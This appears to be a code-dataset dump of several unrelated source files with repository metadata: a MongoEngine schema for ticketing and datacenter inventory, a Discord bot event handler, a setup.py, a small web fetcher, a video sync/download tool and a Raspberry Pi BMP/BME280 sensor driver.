start = IntField(required=True,help_text='epoch')
stop = IntField(required=True,help_text='epoch')
organizations = ListField(StringField(), default=list,help_text='organizations involved with this sprint')
organizations_names = StringField(required=True,help_text='comma separated list of names of orgs')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_sprint)
class oss_ticket(Document):
id = IntField(required=True)
name = StringField(required=True)
description = StringField(required=True)
priority = IntField(required=True,help_text='level 0-4 (4 is most urgent)')
project = StringField(required=True,help_text='link to project')
project_name = StringField(required=True)
type = StringField(required=True)
parent = StringField(required=True)
parent_name = StringField(required=True)
depends = ListField(StringField(), default=list,help_text='this task depends on')
depends_names = ListField(StringField(), default=list,)
deadline = IntField(required=True,help_text='epoch of when task needs to be done')
duplicate = ListField(StringField(), default=list,help_text='list of duplicates to this issue')
duplicate_names = ListField(StringField(), default=list,)
taskowner = StringField(required=True,help_text='owner of task (user)')
taskowner_name = StringField(required=True,help_text='owner of task (user)')
source = StringField(required=True,help_text='owner of task (user)')
source_name = StringField(required=True,help_text='name of user where request came from (can be email, username, ...)')
sprint = StringField(required=True)
sprint_name = StringField(required=True)
organization = StringField(required=True,help_text=' link to organization if any')
organization_name = StringField(required=True)
nextstepdate = IntField(required=True,help_text='date for next day to continue with this ticket')
workflow = StringField(required=True,help_text='current active workflow')
job_status = StringField(required=True,help_text='values are:')
jobs = ListField(StringField(), default=list,help_text='link to workflows')
time_created = IntField(required=True)
time_lastmessage = IntField(required=True)
time_lastresponse = IntField(required=True)
time_closed = IntField(required=True)
messages = ListField(StringField(), default=list,help_text=' reference to message')
comments = ListField(StringField(), default=list,help_text='reference to comments')
datasources = ListField(StringField(), default=list,help_text='source(s) where data comes from (reference)')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
params = StringField(required=True,help_text='json representation of dict which has all arguments required for this ticket')
classes.append(oss_ticket)
class oss_group(Document):
id = IntField(required=True)
name = StringField(required=True)
addresses = ListField(StringField(), default=list,help_text='reference to addr')
members = ListField(StringField(), default=list,help_text='users in group (based on ids)')
members_name = ListField(StringField(), default=list,)
comments = ListField(StringField(), default=list,help_text='reference to comments')
contactmethods = ListField(StringField(), default=list,help_text='reference to contactmethods')
datasources = ListField(StringField(), default=list,help_text='source(s) where data comes from (reference)')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
classes.append(oss_group)
class oss_service(Document):
id = IntField(required=True)
name = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the service if any')
organization_name = StringField(required=True)
label = StringField(required=True)
parent = IntField(required=True)
parent_name = StringField(required=True)
description = StringField(required=True)
type = StringField(required=True)
serviceports = ListField(StringField(), default=list,)
depends = ListField(StringField(), default=list,help_text=' link to other services (what does it need to work)')
depends_names = ListField(StringField(), default=list,)
machinehost = IntField(required=True,help_text='who is machine hosting this service')
memory = IntField(required=True,help_text='in GB')
ssdcapacity = IntField(required=True,help_text='in GB')
hdcapacity = IntField(required=True,help_text='in GB')
cpumhz = IntField(required=True,help_text='in mhz')
nrcores = IntField(required=True)
nrcpu = IntField(required=True)
admin_name = StringField(required=True,help_text='name of admin e.g. admin or root')
admin_passwd = StringField(required=True,help_text='encrypted root passwd')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_service)
class oss_serviceport(Document):
id = IntField(required=True)
serviceid = IntField(required=True)
ipaddr = StringField(required=True,help_text=' e.g. 192.168.10.1/24')
ipaddr6 = StringField(required=True)
url = StringField(required=True)
port = StringField(required=True)
type = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_serviceport)
class oss_machine(Document):
id = IntField(required=True)
name = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the machine if any')
organization_name = StringField(required=True)
label = StringField(required=True)
parent = IntField(required=True)
parent_name = StringField(required=True)
description = StringField(required=True)
type = StringField(required=True)
interfaces = ListField(StringField(), default=list,)
depends = ListField(StringField(), default=list,help_text=' link to other machines (what does it need to work)')
depends_names = ListField(StringField(), default=list,)
assethost = IntField(required=True,help_text='who is asset hosting this machinehost')
memory = IntField(required=True,help_text='in GB')
ssdcapacity = IntField(required=True,help_text='in GB')
hdcapacity = IntField(required=True,help_text='in GB')
cpumhz = IntField(required=True,help_text='in mhz')
nrcores = IntField(required=True)
nrcpu = IntField(required=True)
rootpasswd = StringField(required=True,help_text='encrypted root passwd')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_machine)
class oss_workflowstep(Document):
id = IntField(required=True)
name = StringField(required=True)
description = StringField(required=True)
warningtime = IntField(required=True,help_text=' time that this step can take till warning (in sec)')
criticaltime = IntField(required=True,help_text=' time that this step can take')
nextsteps = ListField(field=StringField(), default=list,)
nextsteps_error = ListField(field=StringField(), default=list,)
jscript = StringField(required=True,help_text='this script will create jobsteps (like branches of a tree) and return all next jobsteps to execute')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_workflowstep)
class oss_asset(Document):
id = IntField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the asset if any')
organization_names = StringField(required=True,help_text='comma separated list of name')
label = StringField(required=True)
parent = StringField(required=True)
parent_name = StringField(required=True)
description = StringField(required=True)
type = StringField(required=True)
brand = StringField(required=True)
model = StringField(required=True)
interfaces = ListField(StringField(), default=list,)
components = ListField(StringField(), default=list,)
depends = ListField(StringField(), default=list,help_text=' link to other assets (what does it need to work)')
depends_names = ListField(StringField(), default=list,)
rack = StringField(required=True)
datacenter_name = StringField(required=True)
pod_name = StringField(required=True)
rack_name = StringField(required=True)
datacenter_label = StringField(required=True)
pod_label = StringField(required=True)
rack_label = StringField(required=True)
u = IntField(required=True,help_text='how many U taken')
rackpos = IntField(required=True,help_text=' how many U starting from bottomn')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_asset)
class oss_document(Document):
id = IntField(required=True)
parent = IntField(required=True,help_text='parent doc (where this document is a version of)')
name = StringField(required=True)
creationdate = IntField(required=True)
moddate = IntField(required=True)
type = StringField(required=True,help_text=' SPREADSHEET:DOC:TXT:CODE:...')
ext = StringField(required=True,help_text=' e.g. docx;xls;...')
contents = StringField(required=True,help_text='full text content')
objstorid = StringField(required=True,help_text='reference on doc mgmt system (stored in sort of key value obj store)')
description = StringField(required=True)
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_document)
class oss_assettype(Document):
type = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_assettype)
class oss_workflow(Document):
id = IntField(required=True)
name = StringField(required=True)
tickettype = StringField(required=True)
description = StringField(required=True)
workflowsteps = ListField(StringField(), default=list,)
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_workflow)
class oss_component(Document):
type = StringField(required=True)
nr = IntField(required=True,help_text='amount of component e.g. 2 CPU')
brand = StringField(required=True)
model = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
comments = ListField(StringField(), default=list,help_text='reference to comments')
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_component)
class oss_job(Document):
id = IntField(required=True)
workflow = StringField(required=True)
workflow_name = StringField(required=True)
startdate = IntField(required=True,help_text='epoch')
enddate = IntField(required=True,help_text='epoch')
status = StringField(required=True,help_text='values are:')
classes.append(oss_job)
class oss_user(Document):
id = IntField(required=True)
organizations = ListField(StringField(), default=list,)
organization_names = StringField(required=True)
name = StringField(required=True)
addresses = ListField(StringField(), default=list,help_text='reference to addr (guid)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
userids = ListField(StringField(), default=list,)
contactmethods = ListField(StringField(), default=list,help_text='reference to contactmethods')
datasources = ListField(StringField(), default=list,help_text='source(s) where data comes from (reference)')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
classes.append(oss_user)
class oss_address(Document):
id = IntField(required=True)
country = StringField(required=True)
city = StringField(required=True)
citycode = StringField(required=True)
zone = StringField(required=True)
region = StringField(required=True)
street = StringField(required=True)
nr = IntField(required=True)
floor = IntField(required=True)
classes.append(oss_address)
class oss_interface(Document):
type = StringField(required=True)
macaddr = StringField(required=True)
vlanid = StringField(required=True)
vxlanid = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the ipaddr if any')
netaddr = ListField(StringField(), default=list,)
connects = ListField(StringField(), default=list,help_text=' link to other interfaces')
brand = StringField(required=True)
model = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
comments = ListField(StringField(), default=list,help_text='reference to comments')
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_interface)
class oss_contactmethod(Document):
id = IntField(required=True)
type = StringField(required=True)
value = StringField(required=True,help_text='e.g. tel nr')
classes.append(oss_contactmethod)
class oss_jobstep(Document):
jobguid = StringField(required=True,help_text='reference to job')
workflow = StringField(required=True)
workflowstep = StringField(required=True,help_text='reference to workflowstep which started this jobsteps')
workflowstep_name = StringField(required=True)
description = StringField(required=True)
order = IntField(required=True,help_text='order in which the steps where executed')
params = StringField(required=True,help_text='json representation of dict which has all arguments')
warningtime = IntField(required=True,help_text=' time that this step can take till warning (in sec)')
criticaltime = IntField(required=True,help_text=' time that this step can take')
startdate = IntField(required=True)
enddate = IntField(required=True)
jscript = StringField(required=True,help_text='script which was executed')
status = StringField(required=True,help_text='values are:')
nextsteps = ListField(StringField(), default=list,help_text='after resolving the script next steps which were triggered (so is after execution), is references to other jobsteps (guid)')
logs = StringField(required=True)
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_jobstep)
class oss_brandtype(Document):
type = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_brandtype)
class oss_datacenter(Document):
id = IntField(required=True)
name = StringField(required=True)
label = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns dc')
organization_name = StringField(required=True)
description = StringField(required=True)
addresses = ListField(StringField(), default=list,help_text='reference to addr')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_datacenter)
class oss_useridentification(Document):
userid = IntField(required=True,help_text=' reference to user')
type = StringField(required=True,help_text=' PASSPORT:ID:DRIVINGLICENSE')
identificationnr = StringField(required=True,help_text='e.g. passport nr')
registrationdate = IntField(required=True,help_text=' epoch')
expirationdate = IntField(required=True,help_text=' epoch')
description = StringField(required=True)
status = StringField(required=True,help_text='VALID:EXPIRED:ERROR')
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_useridentification)
class oss_message(Document):
subject = StringField(required=True)
message = StringField(required=True)
destination = ListField(StringField(), default=list,)
time = IntField(required=True,help_text='epoch')
type = StringField(required=True,help_text='types are: email;sms;gtalk;tel')
format = StringField(required=True,help_text=' html;confl;md;text default is text')
ticket = IntField(required=True)
comments = ListField(StringField(), default=list,help_text='reference to comments')
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_message)
class oss_netaddr(Document):
id = IntField(required=True)
ipaddr = StringField(required=True,help_text=' e.g. 192.168.10.1/24')
ipaddr6 = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_netaddr)
class oss_project(Document):
id = IntField(required=True)
name = StringField(required=True)
descr = StringField(required=True)
organizations = ListField(StringField(), default=list,help_text='which organizations is proj linked to')
organizations_names = StringField(required=True,help_text='comma separated list of names of orgs')
deadline = IntField(required=True,help_text='epoch of when task needs to be done')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_project)
class oss_interfacetype(Document):
type = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_interfacetype)
class oss_organization(Document):
name = StringField(required=True,help_text='domain')
id = IntField(required=True)
description = StringField(required=True)
companyname = StringField(required=True,help_text='optional name')
parent = StringField(required=True,help_text='organization can belong to other organization')
parent_name = StringField(required=True)
addresses = ListField(StringField(), default=list,help_text='reference to addresses (guid)')
contactmethods = ListField(StringField(), default=list,help_text='reference to contactmethod (guid)')
vatnr = StringField(required=True)
datasources = ListField(StringField(), default=list,help_text='source(s) where data comes from (reference)')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_organization)
class oss_pod(Document):
id = IntField(required=True)
name = StringField(required=True)
label = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the pod if any')
organization_name = StringField(required=True)
datacenter = StringField(required=True)
datacenter_name = StringField(required=True)
description = StringField(required=True)
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_pod)
class oss_rack(Document):
id = IntField(required=True)
name = StringField(required=True)
label = StringField(required=True)
pod = StringField(required=True)
pod_name = StringField(required=True)
datacenter = StringField(required=True)
datacenter_name = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the rack if any')
organization_name = StringField(required=True)
description = StringField(required=True)
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_rack)
| 54.125301 | 190 | 0.747885 |
caebb177a6d5c87f8b09e0507f76b02ac300af12
| 185 |
py
|
Python
|
init/CreateParam.py
|
Berni1557/MDDoc
|
06dd3cae302e6f125ebfbb2fc513bb754d72f07d
|
[
"BSD-3-Clause"
] | null | null | null |
init/CreateParam.py
|
Berni1557/MDDoc
|
06dd3cae302e6f125ebfbb2fc513bb754d72f07d
|
[
"BSD-3-Clause"
] | null | null | null |
init/CreateParam.py
|
Berni1557/MDDoc
|
06dd3cae302e6f125ebfbb2fc513bb754d72f07d
|
[
"BSD-3-Clause"
] | null | null | null |
# Import Param
import Param
xmlpath = 'H:/cloud/cloud_data/Projects/MDDoc/init/init.xml'
Param.param.init(xmlpath)
Param.param.create()
Param.param.write()
Param.param.printParams()
| 16.818182 | 60 | 0.767568 |
848f7764f06e631c725d13876bb49955114770d1
| 3,754 |
py
|
Python
|
Extensions/Event-Handler.py
|
Drageast/Die_Botin
|
b574166a37c0f92c34db99931c8c894390fbead9
|
[
"BSD-3-Clause"
] | null | null | null |
Extensions/Event-Handler.py
|
Drageast/Die_Botin
|
b574166a37c0f92c34db99931c8c894390fbead9
|
[
"BSD-3-Clause"
] | null | null | null |
Extensions/Event-Handler.py
|
Drageast/Die_Botin
|
b574166a37c0f92c34db99931c8c894390fbead9
|
[
"BSD-3-Clause"
] | null | null | null |
# Import
from discord.ext import commands
import discord
import asyncio
# Utils
import Utils
# Cog Initialising
class EventHandler(commands.Cog):
def __init__(self, client):
self.client = client
@commands.Cog.listener()
async def on_member_remove(self, user: discord.Member):
try:
await Utils.DBPreconditioning.DEL_Uccount(self, user)
except:
pass
@commands.Cog.listener()
async def on_voice_state_update(self, member, before, after):
if after.channel is None:
return
elif after.channel.id == Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "SpecifiedChannels", "SupportChannelVOICE") and not member.bot:
channel = await self.client.fetch_channel(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "SpecifiedChannels", "AdminChat"))
role1 = discord.utils.get(member.guild.roles, name=str(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "Universals", "Roles", "ServerTeam", "Owner")))
role2 = discord.utils.get(member.guild.roles, name=str(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "Universals", "Roles", "ServerTeam", "Administrator")))
role3 = discord.utils.get(member.guild.roles, name=str(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "Universals", "Roles", "ServerTeam", "Developer")))
embed = discord.Embed(
title="Support Anfrage:",
colour=discord.Colour(Utils.Farbe.Orange),
description=f"**{role1.mention}/{role2.mention}/{role3.mention}**\nDer User: `{member.name}` wartet in dem Sprachkanal: `{after.channel.name}`."
)
embed.set_thumbnail(url=member.avatar_url)
m = await channel.send(embed=embed)
await asyncio.sleep(120)
await m.delete()
else:
pass
@commands.Cog.listener()
async def on_member_join(self, user: discord.Member):
embed = discord.Embed(
title=f"Hallo {user.name}!",
colour=discord.Colour(Utils.Farbe.Welcome_Blue),
description=f"Hallo {user.mention} willkommen auf dem Discord Server:\n**{user.guild.name}** !\nUm Spieler zu suchen, gehe in den Korrespondierenden Kanal,\n"
f"die Angepinnte Nachricht oben im Chat erklärt, wie es funktioniert.\n**Viel Spaß!**"
)
embed.set_thumbnail(url=self.client.user.avatar_url)
embed.set_image(url=user.avatar_url)
channel = discord.utils.get(user.guild.text_channels, name=str(
Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "SpecifiedChannels", "Welcome").lower()))
m = await channel.send(embed=embed)
role = discord.utils.get(user.guild.roles, name=str(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "Universals", "Roles", "Standart")))
await user.add_roles(role)
await asyncio.sleep(300)
try:
await m.delete()
except:
pass
@commands.Cog.listener()
async def on_guild_join(self, guild: discord.Guild):
embed = discord.Embed(
title="Hallo!",
colour=discord.Colour(Utils.Farbe.Welcomer_Blue),
description=f"Hallo {guild.default_role.mention}! Ich bin **{self.client.user.name}**.\nIch bin der Discord Bot von [DrageastLP](https://github.com/Drageast).\n"
f"Ich wurde extra für diesen Server geschrieben und freue ich schon, euch zu assistieren."
)
embed.set_image(url=self.client.user.avatar_url)
await guild.text_channels[0].send(embed=embed)
# Cog Finishing
def setup(client):
client.add_cog(EventHandler(client))
| 37.54 | 178 | 0.654502 |
ca8fd2ab0085b7b39f3bc5c5b751494c30581f73
| 617 |
py
|
Python
|
setup.py
|
Empythy/geometry-learning
|
5300d421ef848c2748a2ba41ced5c6e2fba93200
|
[
"MIT"
] | 21 |
2018-10-09T08:15:29.000Z
|
2022-03-16T08:23:08.000Z
|
setup.py
|
reinvantveer/Topology-Learning
|
5300d421ef848c2748a2ba41ced5c6e2fba93200
|
[
"MIT"
] | 31 |
2017-09-20T13:30:37.000Z
|
2018-03-01T13:24:58.000Z
|
setup.py
|
reinvantveer/Topology-Learning
|
5300d421ef848c2748a2ba41ced5c6e2fba93200
|
[
"MIT"
] | 7 |
2018-11-29T11:39:02.000Z
|
2022-01-12T07:10:26.000Z
|
#!/usr/bin/env python
from distutils.core import setup
setup(name='Topology learning',
version='1.0',
description='Machine learning experiments for geospatial vector geometries',
author='Rein van \'t Veer',
author_email='[email protected]',
url='https://github.com/reinvantveer/Topology-Learning',
packages=['model', 'model.topoml_util', 'model.baseline'],
license='MIT',
install_requires=[
'sklearn',
'slackclient',
'scipy',
'keras',
'numpy',
'shapely',
'tensorflow-gpu'
],
)
| 26.826087 | 82 | 0.581848 |
781951c110e1da5ffe988f55cbf188d9b7002060
| 633 |
py
|
Python
|
top/clearlight/reptile/bilibili/bj_tech_mooc/reptile.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | 1 |
2020-01-16T09:23:43.000Z
|
2020-01-16T09:23:43.000Z
|
top/clearlight/reptile/bilibili/bj_tech_mooc/reptile.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | null | null | null |
top/clearlight/reptile/bilibili/bj_tech_mooc/reptile.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | null | null | null |
import requests
# url = 'http://wsjkw.hebei.gov.cn/list/zt_gzfy.html'
# # url = 'http://wjw.beijing.gov.cn/wjwh/ztzl/xxgzbd/gzbdzcfg/index.html'
# r = requests.get(url)
# print(r.status_code)
# # r.encoding = 'utf-8'
# print(r.encoding)
# print(r.apparent_encoding)
# # print(r.text)
def getHTMLTest(url):
try:
r = requests.get(url, timeout=30)
r.raise_for_status() # 如果状态不是200, 引发HTTPError异常
r.encoding = r.apparent_encoding
return r.text
except:
return "产生异常"
# 只有在这个文件下运行才执行, 当在其他文件导入时是不执行的
if __name__ == '__main__':
url = "http://www.baidu.com"
print(getHTMLTest(url))
| 25.32 | 74 | 0.655608 |
019e0fa2051265605135bf611124245d7171f35f
| 5,874 |
py
|
Python
|
synchroload/synchroload.py
|
rakennus/duraphilms.github.io
|
bdbecdfb55f4870b5ebf572cd2a7eb4e6770ea22
|
[
"MIT"
] | null | null | null |
synchroload/synchroload.py
|
rakennus/duraphilms.github.io
|
bdbecdfb55f4870b5ebf572cd2a7eb4e6770ea22
|
[
"MIT"
] | null | null | null |
synchroload/synchroload.py
|
rakennus/duraphilms.github.io
|
bdbecdfb55f4870b5ebf572cd2a7eb4e6770ea22
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import argparse
import os
import storage
import downloader
import plugins.archive
import plugins.dropbox
import plugins.dailymotion
import plugins.openload
import plugins.twitch
import plugins.u6656
import plugins.vimeo
import plugins.youtube
import plugins.dummy
from makesprites import SpriteTask
SYNCHROLOAD_PLUGINS = {
"archive": plugins.archive,
"dropbox": plugins.dropbox,
"dailymotion": plugins.dailymotion,
"openload": plugins.openload,
"twitch": plugins.twitch,
"u6656": plugins.u6656,
"vimeo": plugins.vimeo,
"youtube": plugins.youtube,
"dummy": plugins.dummy
}
parser = argparse.ArgumentParser(description='Synchronize ')
parser.add_argument("--part", type=str)
parser.add_argument("--playlist", type=str)
parser.add_argument("--hoster", type=str)
parser.add_argument("--resolution", type=int, default=-1)
parser.add_argument("--download", action="store_true")
parser.add_argument("--upload", action="store_true")
parser.add_argument("--delete-offline", action="store_true")
parser.add_argument("--gen-vtt", action="store_true")
args = parser.parse_args()
db = storage.Database()
def pluginByName(pluginName):
return SYNCHROLOAD_PLUGINS[pluginName]
def check_availability(video, upload, playlist, part):
plugin = SYNCHROLOAD_PLUGINS[upload.hoster]
print("[check online] Checking availability for {} {} on {} ({}) ...".format(playlist.name, part, plugin.HOSTER_NAME, upload.id), end="")
if not downloader.check_availability(plugin.linkFromId(upload.id)):
if plugin.HOSTER_KEEP_UNAVAILABLE_UPLOADS:
print(" [FAIL] - Disabling!")
video.disableUpload(upload.id)
else:
print(" [FAIL] - Removing!")
video.removeUpload(upload.id)
else:
print(" [OK]")
def findLocalVideo(playlist, video, version = None, resolution = None, containers = ["mp4", "webm", "mkv"]):
if version:
versions = [version]
else:
versions = storage.VIDEO_VERSIONS
if resolution:
resolutions = [resolution]
else:
resolutions = [2160, 1440, 1080, 720, 540, 480, 360, 240, 144]
upload = storage.Upload()
for version in versions:
upload.version = version
for resolution in resolutions:
upload.resolution = resolution
base = db.getVideoFilenameBase(video, upload, playlist = playlist)
for container in containers:
fileName = base + "." + container
if os.path.isfile(fileName):
return upload, fileName
return "", ""
def getPlaylist(playlistName):
playlist = db.getPlaylistByName(playlistName)
if playlist:
return playlist
print("No such playlist: " + playlistName)
exit(1)
def getVideo(playlist, part):
video = playlist.getVideo(part)
if video:
return video
print("No such video: " + str(part))
exit(1)
def getUpload(video, hoster, resolution):
upload = video.getUpload(args.hoster, args.resolution)
if upload:
return upload
print("No upload for this hoster: " + args.hoster)
exit(1)
def importU6656(playlist):
baseId = "hpudpva"
if playlist == "OdP":
baseId = "hpudodp"
plist = getPlaylist(playlist)
for video in plist.videos:
upl = storage.Upload()
upl.hoster = "u6656"
upl.id = baseId + "/" + video.id + ".mp4"
upl.origin = "youtube"
upl.resolution = 720
video.uploads.append(upl)
if __name__ == "__main__":
if args.delete_offline:
for playlist in db.playlists:
for video in playlist.videos:
for upload in video.uploads:
check_availability(video, upload, playlist, video.id)
db.save()
if args.download:
playlist = getPlaylist(args.playlist)
video = getVideo(playlist, args.part)
upload = getUpload(video, args.hoster, args.resolution)
plugin = pluginByName(args.hoster)
url = plugin.linkFromId(upload.id)
filename = db.getVideoFilenameBase(video, upload, playlist = playlist)
if plugin.HOSTER_HAS_DIRECT_LINKS:
download = downloader.downloadDirect(url, filename)
else:
download = downloader.download(url, filename)
if download:
print("Downloaded video to: {}".format(download))
else:
print("Could not download video from {}.".format(plugin.HOSTER_NAME))
exit(1)
if args.upload:
plugin = pluginByName(args.hoster)
if not plugin:
print("Could not upload: unknown hoster.")
exit(1)
playlist = getPlaylist(args.playlist)
video = getVideo(playlist, args.part)
(upload, fileName) = findLocalVideo(playlist, video)
upload.hoster = args.hoster
upload.id = plugin.upload(fileName)
if upload.id:
video.uploads.append(upload)
if args.gen_vtt:
playlist = getPlaylist(args.playlist)
video = getVideo(playlist, args.part)
source = ""
if args.hoster:
upload = getUpload(video, args.hoster, args.resolution)
plugin = pluginByName(args.hoster)
url = plugin.linkFromId(upload.id)
source = url
else:
(upload, fileName) = findLocalVideo(playlist, video)
source = fileName
task = SpriteTask(source)
task.vttfile = "thumbs/vtt/{}_{}.vtt".format(playlist.name, video.id)
task.spritefile = "thumbs/vtt/{}_{}.jpg".format(playlist.name, video.id)
task.thumb_rate_seconds = 5
task.thumb_width = 200
task.outdir = "/tmp/spritesgen"
task.use_sips = False
task.makeOutDir("/tmp/spritesgen")
task.run()
db.save()
| 29.079208 | 141 | 0.633299 |
01e5ab5afb36fac229d7dcc098109d6d110740ac
| 20,853 |
py
|
Python
|
phypidaq/BMPx80Config.py
|
RMGrau/PhyPiDAQ
|
e7ea08a0d5de9772a1a5e32ccd0ab1bfddf9ff54
|
[
"BSD-2-Clause"
] | 7 |
2018-11-30T13:38:27.000Z
|
2021-03-10T15:37:56.000Z
|
phypidaq/BMPx80Config.py
|
RMGrau/PhyPiDAQ
|
e7ea08a0d5de9772a1a5e32ccd0ab1bfddf9ff54
|
[
"BSD-2-Clause"
] | 5 |
2020-11-11T09:19:00.000Z
|
2022-02-06T09:04:55.000Z
|
phypidaq/BMPx80Config.py
|
RMGrau/PhyPiDAQ
|
e7ea08a0d5de9772a1a5e32ccd0ab1bfddf9ff54
|
[
"BSD-2-Clause"
] | 16 |
2019-04-16T10:15:45.000Z
|
2021-12-15T14:59:31.000Z
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division, unicode_literals
from __future__ import absolute_import
import numpy as np, time, sys, smbus
# default addresses and ChipIDs of Bosch BMP 085/180 and BMP/E 280 sensors
BMP_I2CADDR = 0x77
BMP_I2CADDR2 = 0x76
#BMP_I2CADDR = 0x76 # alternative device I2C address
BMP180_CHIPID = 0x55
BMP280_CHIPID = 0x58
BME280_CHIPID = 0x60
# ID register:
REG_ID = 0xD0
# code of driver classes included below
class BMPx80Config(object):
'''digital thermometer DS18B20Config configuration and interface'''
def __init__(self, confdict = None):
self.BMP_I2CADDR = BMP_I2CADDR
if confdict==None: confdict={}
if 'I2CADDR' in confdict:
self.BMP_I2CADDR = confdict['I2CADDR']
print("BMPx80: I2C address set to %x "%(self.BMP_I2CADDR) )
if 'NChannels' in confdict:
self.NChannels = confdict["NChannels"]
else:
self.NChannels = 2
self.ChanLims = [[-40., 85.],[300., 1100.], [0., 100.]]
self.ChanNams = ['T','P', 'H']
self.ChanUnits= ['°C','hPa', '%']
def init(self):
try:
# set up I2C bus
busnum = 1
bus = smbus.SMBus(busnum) # Rev 2 Pi, Pi 2 & Pi 3 uses bus 1
# Rev 1 Pi uses bus 0
except Exception as e:
print("BMPx80: Error initialising I2C bus - exit")
print(str(e))
sys.exit(1)
try:
try:
# find out which sensor we have:
(self.chipID,) = bus.read_i2c_block_data(self.BMP_I2CADDR, REG_ID, 1)
except:
# try secondary address (BMP280)
print("BMPx80: trying secondary address %x "%(BMP_I2CADDR2) )
(self.chipID,) = bus.read_i2c_block_data(BMP_I2CADDR2, REG_ID, 1)
self.BMP_I2CADDR = BMP_I2CADDR2
# set up sensor
print("BMPx80: ChipID %x "%(self.chipID) )
if self.chipID == BMP180_CHIPID:
self.sensor = BMP085(address=self.BMP_I2CADDR, busnum=busnum, i2c_interface=smbus.SMBus)
elif self.chipID == BMP280_CHIPID:
self.sensor = BMP280(address=self.BMP_I2CADDR, busnum=busnum, i2c_interface=smbus.SMBus)
elif self.chipID == BME280_CHIPID:
self.sensor = BME280(address=self.BMP_I2CADDR, i2c = bus)
else:
print("BMPx80: unknown chip ID - exiting")
sys.exit(1)
except Exception as e:
print("BMPx80: Error setting up device - exit")
print(str(e))
sys.exit(1)
def acquireData(self, buf):
if self.chipID == BME280_CHIPID:
buf[0], p, h = self.sensor.readAll() # temp., press., hum.
if self.NChannels > 1:
buf[1] = p
if self.NChannels > 2:
buf[2] = h
else:
buf[0] = self.sensor.read_temperature() # in degC
if self.NChannels > 1:
buf[1] = self.sensor.read_pressure()/100. # in hPa
def closeDevice(self):
# nothing to do here
pass
## ----- driver section -----------
# driver code for BMP085/180,
# adapted from original code by Tony DiCola, (c) Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
